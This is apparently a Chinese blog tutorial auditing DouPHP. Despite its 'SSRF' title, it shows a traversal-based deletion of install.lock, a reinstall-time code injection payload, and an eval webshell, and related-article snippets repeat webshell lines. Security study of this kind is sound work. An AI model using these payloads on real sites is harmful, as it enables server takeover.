ssrf漏洞代码审计之douphp解析(超详细)

于 2024-01-20 19:07:04 发布
阅读量1k 收藏 28
点赞数 19
文章标签: 网络安全 可用性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59020256/article/details/135720122
版权

1.进入douphp的安装界面

www.douphp.com/install/

由此可知安装界面已经被锁定了,但是由于install.lock是可控的,删除了install.lock后即可进行安装,所以我们现在的目的就是找到怎么去删除install.lock的方法。

要删除目标网站的任意文件,需要先寻找任意文件删除漏洞。所以我们需要找到能被我们控制的删除函数,删掉指定的文件。在php中,可以通过unlink函数来删除文件。用seay源代码审计系统全局搜索含有unlink函数的文件,

2.代码审计

(1)输入unlink( 进行全局搜索

(2)ID=1、2、3......挨个找可以删除的可控变量

ID=1

均为常量,不可控

ID=2

存在变量$sql_filename,且$sql_filename这个变量输出参数时要被is_backup_file处理,所以鼠标右键定位函数is_backup_file后进行查询

发现这个时个正则表达式,且后缀名要为.sql所以与我们要用的目标文件不符合

ID=3

这里需要的也是.sql后缀名的文件,与目标文件不符

以此类推

ID=6

$mobile_logo = $dou->get_one("SELECT value FROM " . $dou->table('config') . " WHERE name = 'mobile_logo'");

这行代码的意思是在字段中获取mobile_logo的值

table()表示给表名加个前缀

由这个路径可知mobile.php是在admin下面,所以需要登录后台

(3)登录后台找到admin/mobile.php

www.douphp.com/admin/mobile.php

(4)上传文件

在点击删除LOGO时可以查看到删除LOGO的连接为

www.douphp.com/admin/mobile.php?rec=system&act=clear_logo

(5)将ulink()函数写为exit()函数查看删除路径

 @ exit(ROOT_PATH . M_PATH . '/theme/' . $_CFG['mobile_theme'] . '/images/' . $mobile_logo);

exit()函数表示 — 输出一个消息并且退出当前脚本

这里输出的消息就是文件路径

点击删除LOGO后会出现

这里便查出文件路径为

D:/phpstudy_pro/WWW/douphp-master/douphp/m/theme/default/images/logo.png

由于我们需要删除的目录在/data/install.lock,所以需要一级一级的进行跳转,比如使用

$a=”../” //这里的$a就表示返回上级目录

我们需要将/m/theme/default/images/logo.png变为/data/install.lock

该值是从数据库中读取的,那么就需要设法将数据库中,mobile_logo字段的值改为

D:/phpstudy_pro/WWW/douphp-master/douphp/data/install.lock

所以现在的问题变成了怎么将mobile_logo字段的值改为D:/phpstudy_pro/WWW

/douphp-master/douphp/data/install.lock

(6)继续分析源代码

这里代码的意思就相当于:

update config set value=$value where name=$name;

在变量name=$name时将config里面的value值更新为$value

这里目标就是将$value替换成D:/phpstudy_pro/WWW/douphp-master/douphp/data

/install.lock

将$name替换成mobile_logo

这里的foreach ($_POST as $name => $value)

Foreach表示遍历数组

$name表示键

$value表示值

(6)查看更新源代码

由此可知当满足$act=’updata’ 时即可执行foreach ($_POST as $name => $value)

 因此现在的问题是如何在$act=’updata’ 时绕过if()代码从而执行foreach代码

(7)用burp抓包

点击提交

这里name="mobile_description"表示键

DouPHP,DouPHP触屏版表示值

把name="mobile_description"改为name="mobile_logo"

DouPHP,DouPHP改为../../../../data/install.lock

放包

点击删除logo触发提交的事件后

出现这个表示删除成功

点击下一步在数据库名这里输入

${file_put_contents($_GET[1],$_GET[2])}

点击安装

表示写入成功

执行代码

http://www.douphp.com/data/config.php?1=666.php&2=%20%3C?php%20eval($_REQUEST[8])%20?%3E

则会创建一个666.php的php文件

里面的内容为

 <?php eval($_REQUEST[8]) ?>

输入http://www.douphp.com/data/666.php?8=phpinfo();

显示出这个页面时则执行成功

爱喝水的泡泡
关注
【Java代码审计SSRF篇
大河之犬的博客
04-02 1354
SSRF(服务端请求伪造)是目前在大型站点中出现频率较高的漏洞。一般情况下,攻击者无法访问攻击目标的内网,SSRF 是攻击者访问内网的凭借之一,因为 SSRF 攻击是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF 的漏洞原理很简单,基本上都是服务端提供了从其他服务器应用获取数据的功能且没有对目标地址和传入命令进行过滤与限制造成的,如常见的从指定 URL地址加载图片、文本资源或者获取指定页面的网页内容等。
ssrf漏洞修复(ssrf漏洞修复方式)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 3955
区块链去中介化、共识机制、不可篡改的特点,增加数据流转效率,减少成本,实时监控资产的真实情况,保证交易链条各方机构对底层资产的信任问题。在区块链行业,地址追溯是一个相对敏感的话题。当然,地址追溯的方法并不限于以上提到的几点,而能够突破交易所的黑客也必然会使用各种反追溯的手段来应对,包括利用去中心化交易所套现,利用混币/搅拌机等技术手段阻碍追溯等。具体方法是通过区块链浏览器输入可疑地址,查询该地址的交易,从交易结果列表中寻找出大额的资金流向,按照新的流向打开每层地址,逐层深入查询,即可得出大额资金的流向图。
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 1042
代码执行 相关函数与语句 eval():会将字符串当作代码来执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码来执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
DouPHP靶场代码审计漏洞复现
最新发布
qq_59023242的博客
12-21 1368
修改文件路径。
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5562
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
代码审计DouPHP_v1.3代码执行漏洞分析
12-03 2528
  0x00 环境准备 DouPHP官网:http://www.douco.com/ 程序源码下载:http://down.douco.com/DouPHP_1.3_Release_20171002.rar 测试网站首页:   0x01 代码分析 1、文件位置: /admin/module.php 第64-77行中: if ($rec == 'install') { ...
漏洞复现之DouPHP_v1.5_Release_20190711cms代码执行漏洞的利用与防御
seek_2022的博客
03-23 6156
文章目录一、代码执行漏洞简介二、DouPHP简介三、PHP双引号的高级用法四、代码审计寻找代码执行漏洞(一)寻找存在代码执行漏洞的点(二)寻找可利用的unlink函数(三)利用代码执行漏洞getshell五、DOUPHP代码执行漏洞总结及防御建议 本文根据网上公开的DOUPHP中安装页面存在的代码执行漏洞进行了代码审计漏洞复现,并据此提出了针对该漏洞的防御建议。 一、代码执行漏洞简介 RCE(remote command/code execute)命令执行或者代码执行。RCE的原理是用户输入的数据被当做
ssrf漏洞php代码审计1
m0_55772907的博客
04-30 1118
(1)原理 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 (2)分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容,服务器用函数curl_exec()执行,并将结果输出 在下面页面做测试发现可以正常跳转,所以可以在此去执行一些恶意操作。 2)file_get_co.
104-web漏洞挖掘之SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞网络安全领域中的一种常见问题,它允许攻击者通过构造特定的请求,使得服务器端发起恶意的外部请求。SSRF漏洞的本质是利用服务器作为一个代理,攻击者可以借此访问那些仅...
WebLogic SSRF 及漏洞修复
11-25
本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-2014-4210这一特定漏洞的修复方法。 #### 二、SSRF漏洞概述 SSRF漏洞通常出现在Web应用中,当应用未能正确地验证服务器响应时,攻击者可以利用这些漏洞绕...
PHP的SQL注入实现(测试代码安全不错)
10-28
看黑客是如何入侵的,我们写编写php代码的过程中,最好自己先测试效果。
DouPHP轻量级企业网站管理系统(含小程序) v1.5 Release20191017
10-21
DouPHP是一款轻量级企业网站管理系统,基于PHP+MYSQL架构的,包含“手机版”、“公众号管理模块”、“小程序”,可以使用它快速搭建一个企业网站。操作简单后台简约明了,从使用者而不是开发者的角度出发设计后台功能布局,完全不需要使用手册就可以轻松进行日常内容编辑工作。功能简单系统核心功能只有简单的单页面、商品、文章等模块,基于实际使用甚至可以将商品和文章卸载。因此它可以应用于十分基础的建站要求,实际上很多企业网站所需的功能就很基础。扩展性强与传统的网站系统不同,DouPHP并不内置模块生成工具,因为生成工具往往使得系统十分臃肿。我们将功能模块开发好(实际上这样功能模块会有更大的开发空间),然后放在DouPHP自带的在线模块扩展功能里,操作时只需要点击安装,即可实现将功能模块下载并自动完成安装,最重要的是这些模块都是完全独立了,模块安装程序只负责下载、解压、数据库导入工作。模块插件功能性模块:投票模块、自定义表单模块、工单模块等、会员模块、订单模块、视频模块、下载模块、图片模块等;企业官网模块:业务范围、解决方案、团队介绍、合作伙伴、资质证书、人才招聘、案例展示等;系统基础模块:公众
php轻量级个人企业,DouPHP轻量级企业建站系统任意文件下载源码漏洞
weixin_35330534的博客
03-17 186
### 简要描述:任意文件下载,漏洞文件:admin/backup.php可以下载整站文件源码,官网测试站通过。### 详细说明:漏洞文件admin/backup.php第187行开始。/**+----------------------------------------------------------* 备份下载+--------------------------------------...
代码审计之_douphp20190711漏洞
whojoe的博客
04-12 1869
douphp20190711代码审计漏洞复现douphp20190711代码审计漏洞复现1.安装时参数控制不严谨getshell1.1 审计过程1.2 分析漏洞2.后台任意文件删除3.遇到的坑3.1 对于文件上传进行审计3.2对于账户登录的记录的ip是否可注入的猜测4.总结4.总结 douphp20190711代码审计漏洞复现 下载链接http://down.douco.com/DouPHP...
DouPHP v1.5 任意文件删除+远程代码执行复现
weixin_51681694的博客
04-18 343
往上走,是一个sql查询语句,将字段名name=mobile_logo的value值取出赋值给$mobile_logo。利用任意文件删除删除data/install.lock,此时页面会回到安装页面,再写入木马即可。由于是往数据库中取得,需要看看其他地方有没有sql注入,或者是现成的update。远程代码执行在安装点,当安装界面填入相应数据时,数据会被放入双引号中执行。接下来就简单了,按代码意思不过上面的代码块,直接修改原参。这里的post传参键值分离,一一插入数据库中。可惜的是数据库中的值并没有改变。
代码审计】OTCMS_PHP_V2.83_代码执行漏洞分析
12-03 868
  0x00 环境准备 OTCMS官网:http://otcms.com 网站源码版本:网钛CMS PHP版 V2.83 [更新于2017.12.31] 程序源码下载:http://d.otcms.com/php/OTCMS_PHP_V2.83.rar 测试网站首页:   0x01 代码分析 1、漏洞文件地址:/admin/sysCheckFile_deal.php  第...
php 轻量级后台,DouPHP轻量级企业建站系统后台任意文件删除缺陷
weixin_35271253的博客
03-17 249
### 简要描述:某处未验证删除的文件路径,导致可以删除任意文件。官网演示站测试通过### 详细说明:漏洞文件: /admin/backup.php第161行```/**+----------------------------------------------------------* 备份删除+-------------------------------------------------...
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 8490
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
存储型xss_某xxphp网站后台存储型XSS漏洞分析
weixin_39755712的博客
11-23 375
简单测试1.1、环境搭建测试环境:在官⽹下载好源码包,解压后访问upload⽬录,根据提示安装好测试环境,即可进⼊后台⻚⾯1.2、测试XSS后台可以新增内容,先试试增加⼀篇⽂章,这⾥框写的是然后发现⻚⾯⾃动跳转到了⽂章列表⻚,并弹出1打开前台⻚⾯,发现也有弹框1,是⼀个存储型的XSS漏洞源码分析2.1、如何保存到数据库使⽤Seay代码审计系统对⽹站源码进⾏⾃动审计,通过软件提供的Mysq...
代码执行漏洞详解
m0_55854679的博客
03-13 4576
文章目录小知识漏洞原理相关函数eval()函数assert()函数preg_replace()函数create_function()函数array_map()函数特殊组合(双引号二次解析) 小知识 代码审计: 通读全文【新手建议读blueCMS】。 危险函数定位【代码审计工具】。 利用曾经出现过的漏洞漏洞原理 用户输入的数据被当做后端代码进行执行。 <?php @eval($_REQUEST[8])?> ,其实一句话木马的本质就是一个代码执行漏洞。 这里提一个概念叫RCE远程命令或者代
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值